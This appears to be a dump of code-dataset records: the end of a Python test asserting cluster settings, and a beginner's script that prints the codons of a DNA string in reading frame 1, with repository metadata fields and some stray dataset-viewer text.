self.assertEqual(desired_capacity, cluster['desired_capacity'])
self.assertEqual(min_size, cluster['min_size'])
self.assertEqual(max_size, cluster['max_size'])
self.assertEqual(metadata, cluster['metadata'])
self.assertEqual(timeout, cluster['timeout'])
# Wait cluster to be active before moving on
action_id = res['location'].split('/actions/')[1]
self.client.wait_for_status('actions', action_id, 'SUCCEEDED')
self.addCleanup(utils.delete_a_cluster, self, cluster['id'])
| 39.613333
| 77
| 0.643891
|
32b4d89bb27da22cc901b94cfd336d96f31f7f11
| 312
|
py
|
Python
|
codons.py
|
nxmarian/learning_python
|
1dc59a5e7f0d036b2baee750d6e4e4c03c874790
|
[
"MIT"
] | null | null | null |
codons.py
|
nxmarian/learning_python
|
1dc59a5e7f0d036b2baee750d6e4e4c03c874790
|
[
"MIT"
] | null | null | null |
codons.py
|
nxmarian/learning_python
|
1dc59a5e7f0d036b2baee750d6e4e4c03c874790
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Print out all the codons for the sequence below in reading frame 1
# Use a 'for' loop
dna = 'ATAGCGAATATCTCTCATGAGAGGGAA'
# your code goes here
for i in range (0, len(dna), 3):
print(dna[i:i+3])
print('reading frame 1')
"""
python3 codons.py
ATA
GCG
AAT
ATC
TCT
CAT
GAG
AGG
GAA
"""
| 12.48
| 68
| 0.695513
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.